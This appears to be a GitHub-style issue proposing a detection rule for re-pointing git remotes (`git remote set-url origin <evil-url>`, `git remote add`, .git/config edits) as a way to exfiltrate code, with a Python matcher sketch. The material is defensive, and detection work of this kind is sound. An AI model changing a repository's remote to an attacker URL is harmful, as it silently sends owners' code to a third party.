Context
From Piccirello's review on PR #13 — if someone changes where `origin` points with `git remote set-url origin <evil-url>`, then a normal `git push origin` silently sends code to the attacker.
What to catch
- `git remote set-url origin <url>`
- `git remote add origin <url>` (or any remote name)
- `.git/config` modifications that change remote URLs
Considerations
- Changing a remote URL is sometimes legitimate (switching from HTTPS to SSH, updating a fork URL).
- Severity should probably be `high` + `warn` since there are legit use cases, but it's a real exfil vector.
- Related to the existing `exfiltration_git_push_non_origin` rule — could be a new pattern in that rule or a standalone.
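Sketch of what the matcher for the three cases above could look like, added here as an illustration rather than the project's own rule code: one function for the `git remote set-url`/`git remote add` command forms (any remote name, skipping `-C`/`-c` and option flags), and a minimal `.git/config` reader that reports remotes whose URL was added or re-pointed between two snapshots. The rule name and the `git@evil.example`-style values in the docstrings and tests are constructed for the example.

```python
import re
import shlex

# Added example detection logic, not the project's rule engine. Severity/action
# labels follow the issue's suggestion; the rule name is constructed.
RULE = {"name": "exfiltration_git_remote_url_change", "severity": "high", "action": "warn"}


def check_git_remote_change(cmdline: str):
    """Return (remote, url) for `git remote set-url|add <name> <url>`, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None
    if not argv or argv[0] != "git":
        return None
    i = 1
    while i < len(argv) and argv[i].startswith("-"):  # skip -C <dir>, -c k=v, --flags
        i += 2 if argv[i] in ("-C", "-c") else 1
    if i + 1 >= len(argv) or argv[i] != "remote" or argv[i + 1] not in ("set-url", "add"):
        return None
    positional, skip = [], False
    for tok in argv[i + 2:]:
        if skip:
            skip = False
        elif tok.startswith("-"):
            skip = tok in ("-t", "-m")  # `git remote add -t <branch> <name> <url>` takes an argument
        else:
            positional.append(tok)
    return (positional[0], positional[1]) if len(positional) >= 2 else None


def remote_urls(config_text: str) -> dict:
    """Minimal .git/config reader: remote name -> url (covers the direct-edit case)."""
    urls, remote = {}, None
    for raw in config_text.splitlines():
        line = raw.strip()
        m = re.match(r'^\[remote "([^"]+)"\]$', line)
        if m:
            remote = m.group(1)
        elif line.startswith("["):
            remote = None
        elif remote and line.split("=", 1)[0].strip() == "url":
            urls[remote] = line.split("=", 1)[1].strip()
    return urls


def changed_remote_urls(before: str, after: str) -> list:
    """Remotes added or re-pointed between two .git/config snapshots: (name, old_url, new_url)."""
    old, new = remote_urls(before), remote_urls(after)
    return sorted(((n, old.get(n), u) for n, u in new.items() if old.get(n) != u), key=lambda t: t[0])
```

A matching rule would still need the "legit use case" judgement from the considerations above (HTTPS to SSH switch, fork URL update), which is why the action here is `warn` rather than block.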
Origin
PR #13 review comment by @Piccirello